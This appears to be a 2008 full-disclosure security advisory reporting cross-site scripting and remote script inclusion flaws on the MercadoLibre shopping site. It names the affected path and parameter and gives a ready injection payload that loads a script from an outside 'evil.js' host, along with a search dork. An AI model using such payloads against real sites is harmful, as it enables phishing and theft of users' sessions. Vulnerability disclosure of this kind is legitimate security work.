Mercadolibre.com suffers from cross site scripting and remote javascript insertion vulnerabilities.
e5d66c658f2078cfc30d24d389e3fc9a796a985b1977213ed9c47555dcdda4f0
[ www.nullcode.com.ar ]
+========================================================================================+
+ Mercadolibre.com security compromised with XSS/ RFI /Phishing flaws +
+========================================================================================+
Author(s): Ivan Sanchez
Product: mercadolibre.com
Web:https://www.mercadolibre.com
Versions,sites affected: Copyright 1999-2008 MercadoLibre S.A.
Date: 27/08/2008
mercadolibre's Shopping Online application is vulnerable to a lot vulnerabilities.
The site runs over SSL "SECURE SOCKET LAYER" Ohh fantastic... ,
which is the technology that turns your browser address bar green for known safe sites and red for known spoof sites.
The idea behind SSL is that users can easily tell if they are on a known safe site and be warned if theyre on a spoof site.
GOOGLE DORKS:
------------
"mercadolibre.com"
Domains affected part I:
------------------------
https://site-affected/jms/mla/reg?act=mail&subAct=<evil-code>
Parameter affeted:
-----------------
subAct
Evil code to input into parameter: "><script src=http://site/scripts/evil.js></script>
Remediation: review and then sanitized all internal code.
------------
run over SLL----
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==============================================================================+
+ Mercadolibre.com security compromised with XSS/ RFI /Phishing flaws +
+==============================================================================+